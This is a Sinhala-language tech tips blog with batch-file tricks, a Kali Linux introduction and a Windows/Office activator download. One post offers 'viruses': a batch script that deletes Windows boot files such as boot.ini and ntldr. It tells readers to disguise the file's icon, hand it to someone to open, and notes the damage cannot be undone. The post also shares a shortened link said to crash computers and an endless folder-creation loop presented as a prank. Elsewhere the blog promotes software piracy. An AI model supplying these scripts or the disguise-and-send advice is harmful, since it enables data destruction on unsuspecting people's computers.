Pages

Friday, September 29, 2017

Microsoft Product ඔක්කම Active කරන්න එකම Activator එකක් (Activator For Windows 7,8,8.1 and Office 10,13) 2014 New

2014 New
Microsoft Product ඔක්කම Active කරන්න පුලුවන්  Activator එකක් අරගෙනයි මන් අද අවෙ. මේකෙන් Windows 7, Windows 8, Windows 8.1 හෙවත් Windows blue වගේම Microsoft Office 10 හා Microsoft Office 13 සාර්ථකව Active කරන්න පුලුවන්. ගොඩක් වටියි කියල හිතනව. 

Wednesday, September 27, 2017

එක Click එකෙන් Folder 1000 හදමුද?

<script type="text/javascript" src="//uprimp.com/bnr.php?section=General&pub=143379&format=300x250&ga=g"> br />
 http://image.made-in-china.com/2f0j00EevtSawnbcru/A4-Size-Expanding-File-Folder-NO-EF-014-.jpg

අද මම කියන්න යන්නේ පොඩ් අතල් වෙඩක් ගැන තම එක පරිණ file 1000 හදන විදිය ගැන ........!!!!!!

පහල කෝඩ් එක Notepad එකක ලියගෙන anyname.bat කියල Save කරගන්න.

@echo off
:top
md %random%
goto top
 
ඊලගට Save කරපු anyname.bat file එකේ Shortcut එකක් Desktop එකට දාගන්න.ඊලගට මෙ ෆයිල් එකෙ Properties ගන්න.Change Icon වලට ගිහින් කැමති එකකට මාරු කරන්න.Name එකත් මරු කරන්න.Click කරපු ගමන් එක පාරින් ෆෝල්ඩර් 1000ක්  හැදෙනවා නියම ෆන් එක.
මතක ඇතුව comment පාරක් දන්න මතක ඇතුව .............good bye.........!!!!
https://goraps.com/fullpage.php?section=General&pub=143379&ga=g

ආතල් එකට Metrix එකක්

චමියා මේ post එකෙන් කියලා දෙන්න යන්නේ පොඩි fun වැඩක් .....මේක metrix එකක්.............
  
මෙන්න screen ෂොට් එකක් (ඔකේ ඉන්න මැස්සෝ දෙන්නව ගණන් ගන්න  එපා එකත් පොඩි සොෆ්ට් එකක් එක ගැනත් මම post එකක් දැන්නම් ඉක්මනට)



 අපි එහෙනම්  වැඩේට බහිමු  පහල තියන  code ටික  notepad  එකට copy කරගෙන කැමති නමක්  දිලා
{.bat} කියල අගට දීල save කරන්න දැන් වැඩේ හරි .......කොහොමද ඉලක්කම් ටික දුවන ලස්සන ....තද නේද.......??/ Ex: Metrix.bat 


@echo off

color 02
cls
echo W
ping localhost -n .15 >nul
cls
echo Wa
ping localhost -n .15 >nul
cls
echo Wak
ping localhost -n .15 >nul
cls
echo Wake
ping localhost -n .15 >nul
cls
echo Wake
ping localhost -n .15 >nul
cls
echo Wake u
ping localhost -n .15 >nul
cls
echo Wake up
ping localhost -n .15 >nul
cls
echo Wake up
ping localhost -n .15 >nul
cls
echo Wake up N
ping localhost -n .15 >nul
cls
echo Wake up Ne
ping localhost -n .15 >nul
cls
echo Wake up Neo
ping localhost -n .15 >nul
cls
echo Wake up Neo.
ping localhost -n .15 >nul
cls
echo Wake up Neo..
ping localhost -n .15 >nul
cls
echo Wake up Neo...
ping localhost -n 5 >nul
cls
echo T
ping localhost -n .15 >nul
cls
echo Th
ping localhost -n .15 >nul
cls
echo The
ping localhost -n .15 >nul
cls
echo The
ping localhost -n .15 >nul
cls
echo The M
ping localhost -n .15 >nul
cls
echo The Ma
ping localhost -n .15 >nul
cls
echo The Mat
ping localhost -n .15 >nul
cls
echo The Matr
ping localhost -n .15 >nul
cls
echo The Matri
ping localhost -n .15 >nul
cls
echo The Matrix
ping localhost -n .15 >nul
cls
echo The Matrix
ping localhost -n .15 >nul
cls
echo The Matrix h
ping localhost -n .15 >nul
cls
echo The Matrix ha
ping localhost -n .15 >nul
cls
echo The Matrix has
ping localhost -n .15 >nul
cls
echo The Matrix has
ping localhost -n .15 >nul
cls
echo The Matrix has y
ping localhost -n .15 >nul
cls
echo The Matrix has yo
ping localhost -n .15 >nul
cls
echo The Matrix has you
ping localhost -n .15 >nul
cls
echo The Matrix has you.
ping localhost -n .15 >nul
cls
echo The Matrix has you..
ping localhost -n .15 >nul
cls
echo The Matrix has you...
ping localhost -n 5 >nul
cls
echo F
ping localhost -n .15 >nul
cls
echo Fo
ping localhost -n .15 >nul
cls
echo Fol
ping localhost -n .15 >nul
cls
echo Foll
ping localhost -n .15 >nul
cls
echo Follo
ping localhost -n .15 >nul
cls
echo Follow
ping localhost -n .15 >nul
cls
echo Follow
ping localhost -n .15 >nul
cls
echo Follow t
ping localhost -n .15 >nul
cls
echo Follow th
ping localhost -n .15 >nul
cls
echo Follow the
ping localhost -n .15 >nul
cls
echo Follow the
ping localhost -n .15 >nul
cls
echo Follow the w
ping localhost -n .15 >nul
cls
echo Follow the wh
ping localhost -n .15 >nul
cls
echo Follow the whi
ping localhost -n .15 >nul
cls
echo Follow the whit
ping localhost -n .15 >nul
cls
echo Follow the white
ping localhost -n .15 >nul
cls
echo Follow the white
ping localhost -n .15 >nul
cls
echo Follow the white r
ping localhost -n .15 >nul
cls
echo Follow the white ra
ping localhost -n .15 >nul
cls
echo Follow the white rab
ping localhost -n .15 >nul
cls
echo Follow the white rabb
ping localhost -n .15 >nul
cls
echo Follow the white rabbi
ping localhost -n .15 >nul
cls
echo Follow the white rabbit
ping localhost -n .15 >nul
cls
echo Follow the white rabbit.
ping localhost -n 5 >nul
cls
echo K
ping localhost -n .15 >nul
cls
echo Kn
ping localhost -n .15 >nul
cls
echo Kno
ping localhost -n .15 >nul
cls
echo Knoc
ping localhost -n .15 >nul
cls
echo Knock
ping localhost -n .15 >nul
cls
echo Knock,
ping localhost -n .15 >nul
cls
echo Knock,
ping localhost -n .15 >nul
cls
echo Knock, k
ping localhost -n .15 >nul
cls
echo Knock, kn
ping localhost -n .15 >nul
cls
echo Knock, kno
ping localhost -n .15 >nul
cls
echo Knock, knoc
ping localhost -n .15 >nul
cls
echo Knock, knock
ping localhost -n .15 >nul
cls
echo Knock, knock,
ping localhost -n .15 >nul
cls
echo Knock, knock,
ping localhost -n .15 >nul
cls
echo Knock, knock, N
ping localhost -n .15 >nul
cls
echo Knock, knock, Ne
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo.
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo. .
ping localhost -n .15 >nul
cls
echo Knock, knock, Neo. . .
ping localhost -n 5 >nul
cls
:start
echo 010 010 10 01 0100 10 010 10 010 1001 10 010 10 10 010 101110 10 100 100 1011
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 01000
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 0000111001011011
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 00100111
echo 001 0010 10 010010010 010 100 10 01 010 010 010 010 10 010 10 010 10 01010 0
echo 000 010 00                    001 0010 00                    1000100 10
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 100
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 001
echo 111     11111     11111     11111     11111     11111     1111111   111111111
echo 101010100 100 00100 010 0010 01000010 010 01000100010 01000 0100100 100 011
echo 1111 10 010 01 0010100 10 01001010 1 11 0001 00 001 1 1 01  0100000 1 1 11 1
echo 000 1000 10 010 100 0010 10 01 010 010 10000 010 010 01 10010010010 1001 10011
echo 1010010 010 100 010 10 010 10 010 1010 010 01 01 00001 010 01 010 010 10 0011111
echo 101 0100010 1000001 01010 10 0100010 10 0010 010010 0 010 010 00001110010110111
echo 000 010 01010010 010001001 00100100 1010 01001001 0010010 01001000100 001001111
echo 0000 00 000000000000 000000000000000000 00000000000001111 10 0100000 1000000111
echo 111111111111111111111111111111111111111111111111111111111111111111111111111110
goto start

.මතක ඇතුව comment එකක් දාගෙන යන්න ..................!!!!!      

ඔයලටම කියල calculator එකක් හදාගන්න කෑමතිද?

හායි යාළුවනේ චමියා අද කියල දෙන්න යන්නේ ඔයාටම කියලා calculator එකක් හදාගන්න  විදිය ගැන
හරිම ලේසියි පහල තියන code ටික notepad copy කරගෙන කැමති නමක් දීල (  .bat ) කියල save කරන්න
EX: calculator.bat



 @echo off
color a
title Calculator (
It Danuma Bedagamu)
:start
cls
set /p math=I'm It Danuma Bedagamu .....Enter your calculation:
if %math%==Exit exit


set /a math2=%math%
echo %math%=%math2%
echo.
pause
goto start
 
 
 මෙන්න screen ෂොට් එකක්........
 
comment එකක් දන්නා  අමතක කරන්න එපා හොදේ .............

Folder lock ලේසියෙන්ම කඩමු......








මේක ලේසි වැඩක් යාලුවනේ....එකට ඕන වෙන්න මම පහළ දීලා තියෙන bat file එක විතරයි.ඔයාලට unlock කරගන්න ඕන folder එක තියෙන්න Audio කියන folder එක ඇතුලේ කියල හිතමුකෝ...ඔයාලට කරන්න තියෙන්නේ
Folder Unlock කියන bat file එක copy කරගෙන Audio කියන folder එකට paste කර ගෙන open කරන්න.ඔන්න දැන් වැඩේ  හරි.......මේකන් unlock වෙච්ච ගමන්ම අර folder එක ඇතුලේ තිබ්බ file ටික නෙමේ පෙන්නන්නේ.වෙන file 3ක් 4ක් පෙන්නයි.අන්න ඒ file ඇතුලේ තමයි අර folder එක ඇතුලේ තියෙන file ටික තියෙන්නේ.මම හිතනවා කට්ටියට වැඩේ තේරෙන්න ඇති කියල.මොක්ක හරි awlk තිබ්බොත් commenet කරන්නකෝ.

Notepad එකෙන් Folder locker එකක්...........

 http://bloggingexperiment.com/wp-content/uploads/am/contents/2009/12/Locker-Icons-by-TheIconLab-e1262300382224.png
Notepad එකෙන් Folder locker එකක් හදන හැටි දන්නවාද? මේ code එක copy කරල notepad එක්කට paste කරගන්නකො.

cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==YOUR PASSWORD HERE goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
ඉන් පසු YOUR PASSWORD HERE කියන තැනට ඔයාලට ඕනෙ password එක දීල  Locker.bat කියල save කරල බලන්නකො.

Saturday, September 16, 2017

ලැප්ටොප්,පෙන්ඩ්‍රයිව්,අයි ෆොන් සහ තවත් දේවල් නොමිලේ ! !

 


                   ඔබත් නිකරුනේ ඉන්ටර්නෙට් සැරිසරන්නේක්ද? සීයට 40% කගේ පිලිතුර ඔවු. දැන් මම කියන්න හදන්නේ ඒ පිලිතුර නැති කරන විදිය මෙහෙමයි ගොකැනෝ කියලා සයිට් එකක් තියෙනවා ඒ කෙන් හම්බවෙනවා පොයින්ට්ස් ඒවා එකතු කරලා ඔයාට පුලුවන් එයාලා ගාව තියෙන තෑගි ගන්න.මේ තියෙන්නේ ඒවාට උදාහරණ-

1.පෙන් ඩ්‍රයිව්
2.පවර් බෑන්ක්
3.ඉයර් ෆොන්
4.අයි ෆොන් 6
5.Playstation 4
6.කැමරා
7.ඩ්‍රෝන යානා
8.Smart Watch
9.හොවෙර් බෝඩ් (මේක ගත්තොත් ගොඩ මේක ලංකාවේ ලක්ෂ එකහමාරක් වෙනවා මරුනේ.)
10.ඩිජේ බේස් ස්පීකර්

                  හරි මම 10 ක් කියුවා එපා වෙන්නත් ඇති මම එකී මෙකී ගොඩක් දේවල් එකේ තියෙනවා.

             මම කියුවේ බොරු නම් බලන්න Screen short



         මේකෙන් පොයින්ට්ස් හොයන්නේ මෙහෙමයි.ඉස්සෙල්ලම හැමදාම ලොග් වෙනකොටම පොයින්ට් එකක් තියෙනවා ඒක ගන්න පුලුවන්. තව Mission Complete කරන්න තියෙනවා ඒකෙන් දවසකට එකයි කරන්න පුලුවන්. ඒකේ තියෙන්නේ මෝඩ ප්‍රශ්න ඒකට උත්තර දීලා  පොයින්ට් 1ක් ගන්න පුලුවන්.එතකොට දවසකට පොයින්ට් 2ක් ෂුවර්.

               තව  ක්‍රමයක් තමා යාලුවන්ට ඉන්වයිට් කිරීම.ඒ කියන්නේ ඔයාගේ රෙෆරල් ලින්ක් එකේ ගිහින් එයා රෙජිස්ටෙර් වුනොත් ඔයාට පොයින්ට් එකක් ලැබෙනවා. ඔයා යාලුවෝ 30 දෙනෙකුට ඉන්වයිට් කරලාREGISTER වුනාට පස්සේ ඔයා Gold Member කෙනෙක් වෙනවා. එතකොට පොයින්ට්  Double වෙලා හම්බ වෙනවා. ඒ විතරක් නෙවෙයි Free ටී ෂර්ට් එකකුත් ඔයා Gold Member කෙනෙක් වුනාම ලැබෙනවා. ඔයා හැමවෙලාවෙම මෙහෙම කරන්න. ඔයා රෙජිස්ටර් වෙනකොට වෙන කෙනෙක්ගේ රෙෆරල් ලින්ක් එකෙන් යන්න. එතකොට ඔයාටත් වාසියි එයාටත් වාසි.මෙහෙමයි ඔයා වෙන කෙනෙක්ගේ රෙෆරල් ලින්ක් එකෙන් ගියොත් එයාට වාසි.
 1. Gokano වෙබ් අඩවියට පිවිසීමට පහත ලින්කුව click කරන්න
                               REGISTER
 2. ඉන් පසුව පැමිණෙන මෙම Register Form එකට ඔයාගේ ඇත්තම තොරතුරු දෙන්න.

image

ටී ෂර්ට් size එක හරියටම දෙන්න ඔයාගේ site එක.
ඒ වගේම ඔයාල ඉන්න තැනට අදාළ zip code එක හොයාගන්න. ඔයාල ඉන්න ගමේ නම දාල postal code කියල google search කලත් හරි නැත්නම් http://www.sri-lankan.net/colombo-district.html site එකෙනුත් හොයාගන්න පුලුවන්
දැන් Register වෙලා ඔයා දුන්නු Email එකට Log වෙලා, Account එක Active කරගන්න
(ඔයාගේ මේල් එකට ලින්ක් එකක් ඇවිත් ඇති ඒක click කරන්න)
මේකේ point වලට තමයි බඩු ගන්න පුළුවන්. උදාහරණයක් විදිහට points 30 කට

image

points 15 ට

image

වගේ ගෙන්න ගන්න පුළුවන්. රෙජිස්ටර් උනාට පස්සේ prizes වලට ගිහින් බලන්න පැනේ ඉඳන් macbook එක වෙනකම් ගෙන්න ගන්න පුළුවන්.

image






image

Saturday, September 9, 2017

sinhala keyman free | සිංහල කීමෑන් නොමිලේ

මම අද ඔයාලට අරගෙන ආවේ ගොඩක් අය ලග තියන ඒත් හරි යටම windows 8 /windows 8.1 / Windows 7 වලට වැඩකරන ටයිප් කරන්න ගියාම කවුරුත් වගේ මැසිවිලි නගන software එකක් ඒ තමයි ඒ තමයි sinhala keyman.ගොඩක් sinhala keyman වල software වෙම දාල කී බෝඩ් එක වෙනම දාන්න ඕන ඒ දාලත් සමහර වෙලාවට හරියට වැඩ කරන්නේ නැහැ ඒත් මම ඔයාලට පහල දීල තියන කී මෑන් එක එලකිරි වගේ වැඩ. ඔයාලත් දාගෙනම බලන්න. ඔයාලට මේ sinhala keyman එක හොදයි කියල හිතෙනව නම්  comments එකකුත් දාලම යන්න.

තවත් කීමෑන් එකක් පහල තියනව ඒකත් උත්සාහ කරල බලන්න

Friday, September 1, 2017

නමක් නැති Folder එකක් හදමුද?

අද ඉතින් මම පොඩ්ඩක් වෙනස් දෙයක් ඔයගොල්ලන්ට කියල දෙන්න හිතුව. ඔයගොල්ලො කවද හරි try කරල තියෙනවද නමක් නැති folder එකක් හදන්න? ඔයගොල්ලො ඉතින් කරන්න ඇත්තෙ මොකක්වත් type කරන්නෙ නැතුව ඉන්න එකනෙ. මමත් ඉතින් ඕක අනේක වාරයක් උත්සාහ කරල තියෙනව. ඒත් ඉතින් වැඩේ හරිගියේ නෑ.
මෙන්න මෙහෙමයි එහෙනම් නමක් නැති folder එකක් හදන්නෙ.
මුලින්ම folder එකක් හදන්න. 

දැන් rename ගිහින් folder එකේ නම delete කරන්න. 

ඊට පස්සෙ Alt ඔබාගෙන 0160 type කරන්න.

දැන් ඉතින් ඔයාගෙ නමක් නැති folder එක හැදිල ඉවරයි !
ඔන්න ඔහොමයි පුතෝ නමක් නැති folder එකක් හදන්නෙ. ඔයගොල්ලන්ට මොකක් හරි ප්‍රශ්නයක් ඇති වුනොත් එහෙම comment එකකින් ඒක මට කියන්න.
                                                          හැමෝටම සුබ දවසක් !

Penetration Testing and Ethical Hacking Linux Distribution - Kali Linux සිංහල හැඳින්වීම



හැමෝටම ආයුබොවන්! ඔන්න එහෙනම් අපි හැමෝම අහන්න කැමති දෙයක් ගැන කියන්න හිතුව. ඔව්, ඔය මාතෘකාවෙ තියෙන්නෙ. "Penetration Testing and Ethical Hacking Linux Distribution - Kali Linux" !!!
Kali Linux කියල අහපු ගමන්ම ඉතින් හැමෝටම මතක් වෙන්නෙ Hack කරන්න පුලුවන් කියලනෙ. ඒත් ඉතින් මේක Hack කරන්න හදපු OS එකක් නෙවෙයි. මේක හදල තියෙන්නෙ system වල අඩුපාඩු එහෙමත් නැත්නම් vulnerabilities හොයන්න තමයි මේ මෙහෙයුම් පද්ධතිය හදල තියෙන්නෙ. මේකෙන් Hack කරන්න පුලුවන් කියන්නෙ මේකෙන් ගොඩක් system වල අඩුපාඩු හොයාගෙන ඒ අඩුපාඩු මාර්ගයෙන් තමයි hack කරන්න පුලුවන් වෙන්නෙ.


හොදයි එහෙනම්. මුලින්ම මේ මෙහෙයුම් පද්ධතියෙ පසුබිම ගැන කතා කරමු. මේකත් Debain මෙහෙයුම් පද්ධතියක්. ඒ කියන්නෙ Linux, Ubuntu, Redhat වගේ තමයි. ඔය OS වල වගේම මේකෙත් වැඩ කරන්න තියෙන්නෙ ගොඩක් වෙලාවට terminal එකත් එක්ක. GUI මෘදුකාංග ඇත්තෙම නෑ. පහල දැකගන්න පුලුවන් ඔයාට Kali Linux වල Desktop එක.


දැන් මේකෙ තියෙන ඔය hack කරන්න පුලුවන් කියන පට්ටම software ටික ගැන දැනගමු. මේකෙ තියෙන මෘදුකාංග ප්‍රධාන කොටස් 13 කට බෙදල තියෙනව.


  1. Information Gathering
  2. Vulnerability Analysis
  3. Web Application Analysis
  4. Database Assessments 
  5. Password Attacks
  6. Wireless Attacks
  7. Reverse Engineering
  8. Exploitation Tools
  9. Sniffing and Spoofing
  10. Post Exploitation
  11. Forensics
  12. Reporting Tools
  13. Social Engineering Tools
ඒ වගේම මේව ඇතුලෙ ගොඩක් ප්‍රසිද්ධ මෘදුකාංග තියෙනව. ඒව සමහරක් තමයි,

  • Nmap
  • Burpsuit
  • Aircrack-ng
  • Metasploit
  • sqlmap
  • Jonny
  • SET
                                                           

වගේ තවත් ගොඩක් හොඳ software තියෙනව. මේ හැම එකක්ම hack කරන්න ගොඩක් ප්‍රයෝජනවත්. මේව වලින් කරන්න තියෙන්නෙ hack කරන එක නෙවෙයි තමයි. එ වුනාට මේ tools තමයි හැම hacker කෙනෙක්ම වගේ පාවිච්චි කරන්නෙ system එකක දුර්වලතා අදුරගෙන ඒව hack කරන්න.

දැන් ඉතින් හැමෝම බලන් ඇති මම Hack කරන හැටි කියල දෙනකම්. ඒත් ඉතින් මේ blog එකේදි නම් මම Kali Linux ගැන කියල දෙන්න යන්නෙ නෑ. ඒ මම දන්නෙ නැති හින්ද නෙවෙයි. මොකද මම දැනටමත් Kali Linux ගැන Blog එකක් පටන් අරන් තියෙන නිසා. තවම පටන් ගත්ත ගමන් නිසා වැඩිය දේවල් නෑ. ඒත් ඉතින් post 4ක් 5ක් තියෙනව. ගොඩක් වැදගත් වෙයි ඒ ටික.

 තවත් ඉතින් ඕනෙ තරම් blog, website තියෙනව kali linux ගැන ලියපු. ඒත් ඉතින් සිංහල ඒවනම් ඇත්තෙ නෑ. තියෙන ඒවවලත් කිසිම දෙයක් නෑ Install කරගන්න හැටියි Wifi Hack කරන හැටියි වලට වඩා. මම නම් ඉතින් එහෙම අතරමග නවත්තන්නෙ නෑ. දිගටම කරගෙන යන්න තමයි බලාපොරොත්තුව. එහෙනම් මම blog සහ website ටිකකට link දෙන්නම් ගිහින් ඉගෙනගන්න.


මමත් ඉගෙනගත්තෙ ඔය යට තියෙන තුනෙන් තමයි. ගොඩක්ම හොඳ Website ටිකක්. මගෙ එක නැතත් ඒ ටික බලන්න. ගොඩක් දේවල් තියෙනව.

එහෙනම් ඔන්න මම ගියා. Kali Linux ගැන පොඩි ආසාවක් ඇති වුනානම් අදම ගිහින් මගේ Blog එකෙන් සිංහලෙන්ම ඉගෙනගන්න පටන් ගන්න. හැබැයි ඉතින් එක පාරටම Wifi Hack කරන එකටයි Facebook Hack කරන එකටයි පනින්න එපා. මුල ඉදන්ම කියවන්න.

                                         හැමෝටම එහෙනම් සුබ දවසක් !
                                                     

Computer එක on වෙනකොට ඔයාගෙ නම කියන්න හදමුද?



ඔයගොල්ලන්ගෙ computer එක On කරහම ඔයාව සාදරයෙන් ආදරයෙන් නම එහෙම කියල පිලිගන්නවද? නැහැ නේ....! එහෙනම් අද මම කියල දෙන්නෙ computer එක ඔයාලට කැමති ඕනි බම්බුවක් on වෙනකොට කියන්න හදන හැටි. මෙන්න මෙහෙමයි එහෙනම් වැඩේ කරන්නෙ.


මුලින්ම මම මේ දීල තියෙන code එක copy කරගන්නකො.

Dim speaks, speech
speaks="Welcome to your PC, Your Name"
Set speech=CreateObject("sapi.spvoice")
speech.Speak speaks

දැන් notepad එක open කරල මේ code එක ඒකට paste කරන්න. ඊට පස්සෙ ඒක welcome.vbs කියල save කරන්න.

දැන් මම මෙන්න මේ දීල තියෙන address එක copy කරගන්න. දැන් ඔයාගෙ computer එකේ search ගිහින් ඒක paste කරන්න. මතක තියාගන්න, මම IT Solution කියල දාල තියෙන තැන ඔයාගෙ computer එකේ username එක දාන්න.

C:\Users\IT Solution\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup

Enter ඔබන්න. දැන් window එකක් open වෙයි.

දැන් ඔයා අර welcome.vbs එක save කරගත්ත තැනට ගිහින් ඒක copy කරගෙන ඇවිත් අර මුලින් open වෙච්ච window එකේ paste කරන්න.

ඊලග පාර ඔයා computer එක on කරන කොට ඉතින් ඔයාගෙ නම කියල හොදට පිලිගනියි. මතක තියාගන්න, code එකේ speaks="Welcome to your PC, Your Name" කියන කොටසෙ Your Name තියෙන තැනට ඔයාගෙ නම දාන්න. ඔයාට ඒ message එක කැමතිනං වෙනස් කරන්නත් පුලුවන්.

HACK කරන එක රිදෙන්නම කරමු. "DO AT YOUR OWN RISK"

අද දෙනවා සුපිරි වයිරස් 3ක්. ඒකත් දෙන එක රිදෙන්නම දෙනවා.


1. URL එකකින් සිස්ටම් එක Crash කරමු.

මෙච්චරයි මේකේ කතාවනම්. පහල තියන URL එක ක්ලික් කළා කියන්නේ ටොපිය කෑවා කියන එක තමයි. මේක ක්ලික් කරලා පැයක් හමාරක් යද්දී කම්පියුටර් එකේ මුළු සිස්ටම් එකටම බබා හම්බ වෙනවා. ඉතින් තේරෙනවා නේද කරන්න ඕන වැඩේ. කාටහරි URL එකක් ක්ලික්

කරවන එක මහා ලොකු වැඩක් නෙමෙයිනේ. ඔන්න එහෙනම් පහල තියනවා බඩු. ලින්ක් එක තවමනම් වැඩ කරනවා. අනාගතය ගැනනම් කියන්න දන්නේ නැහැ. ඔයාලගේ ආරක්ෂාව සදහා ලින්ක් එක නිකන් Text එකක් විදිහටයි දාල තියෙන්නේ.

http://tiny.cc/ibJUN


2. පරිගණකයක් සදහටම නිදි කරවමු

මේකෙත් පොඩි කුප්පියක් තියෙන්නේ. ඒත් වෙන වැඩේනම් පොඩි නැහැ. මේකෙන් වෙන්නේ පරිගණකය Shut Down වෙලා Reboot වෙන්න ඕනා ෆයිල්ස් ටික මකලා පරිගණකය Restart වෙවී තියන එකයි. මේ පහල තියන ටෙක්ස්ට් ටික Notepad එකකට Paste කරලා මොකක්හරි නමක් දීලා අන්තිමට .bat කියලා දීලා සේව් කරන එකයි.
උදා:- Athwela.bat
ඔන්න ඔය වගේ. මෙන්න පහල තියනවා කෝඩ් එක.



@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
 
ඒ ෆයිල් එකේ Icon එක එහෙම පොඩ්ඩක් වෙනස් කරලා කාටහරි දුන්නම කොහොමද දැනෙන සනීපෙ.. තේරුනා නේද මොනවද කියන්නේ කියලා.. ;) ඊට පස්සේ දෙන්න කාටහරි Open කරන්න කියලා.
 
සැ.යු.- මේ ෆයිල් එක Open කරලා වැඩේ උනාට පස්සේ Recovery කරන්නත් බැහැ හොදද..
 
 
3. තත්පර කීපයකින් Folders 1000කට වඩා හදමු
 
මේකෙදි කරන්න තියෙන්නේ ඔය දෙවෙනි එකේ කරපු ටිකමයි. කෝඩ් එක විතරයි වෙනස්. ආහ්හ්හ්.. මේක Rename කරන්න ඕන 1000folders.bat කියන විදිහට. පස්සේ ඉතින් පුළුවන් Shortcut එකක් එහෙම දාල නමයි Icon එකයි එහෙම වෙනස් කරගන්න. ඔන්න එහෙනම් පහල තියනවා කෝඩ් එක..
 
@echo off
:top
md %random%
goto top 
 

SOFTWARES නැතිව FACEBOOK , YOUTUBE එකේ විඩියෝ Download කරමු

අපි බලමු කොහොමද facebook සහා youtube විඩියෝස් කිසිම සොෆ්ට්වෙයාර් එකක් නැතුව ඩවුන්ලෝඩ්.....කරගන්නේ කියලා...මුලිම්ම facebook වීඩියෝ ඩව්න්ලෝඩ් කරන විදිය බලමු.
*මුලිම්ම ඩව්න්ලෝඩ් කිරීමට අවශ්‍ය වීඩියෝ එක උඩ රයිට් ක්ලික් කරලා නිව් ටැබ් එකකින් ඕපන් කරගන්න

දැන් වීඩියෝ එකේ ලින්ක් එක https://www.facebook.com/photo.php?v=10152375056316788 ඔය ආකාරයෙන් දිස් වේ පහත රුපයේ ආකාරයට '' https://www. '' පසු ' down ' ලෙස ටයිප් කර මේ ආකාරයෙන්  ( https://www.downfacebook.com/photo.php?v=10152375056316788 )
එන්ටර් කරන්න.
ඉන්පසු ඔබට පහත රුපයේ දිස් වෙන අයුරෙන් ඔබට කැමති ෆෝමැට් එකකින් ඔබේ විදෙඕ එක ඩවුන්ලෝඩ් කර ගත හැක....

දැන් අපි බලමු youtube වීඩියෝඩවුන්ලෝඩ් කරන්නේ කොහොමද ද කියලා 

*මුලිම්ම ඔබට අවශ්‍ය වවීඩියෝ එකේ ලින්ක් එකට ඉදිරියෙන්
 https://www.youtube.com/watch?v=H4AVtltX5xI
පහත රුපයේ ආකාරයට  https://www. පසු ss දෙකක් යොදා එන්ටර් කරන්න.


* දැන් පහත රුපයේ දිස් වෙන විදියට ඔබට කැමති ෆෝමැට් එකකින් ඔබේ විදෙඕ එක ඩව්න්ලෝඩ් කර ගත හැක 
ඔන්න ඔහොමයි කිසිම සොෆ්ට්වෙයාර් එකක් නැතිව facebook සහා youtube විඩියෝ ඩව්න්ලෝඩ් කරගන්නේ 
මම හිතනවා ඔයාලා මේ පොස්ට් එකෙන් නොදන්නා දෙයක් දැනගත්තා කියලා මේ ගැන දන්නේ නැති අයට බලන්න මේ පොස්ට් එක ෂෙයාර් පාරක් දාලා යන්න එහෙනම් තවත් පොස්ට් එකකින් හමුවීමේ බලාපොරොත්තුවෙන් මම ගියා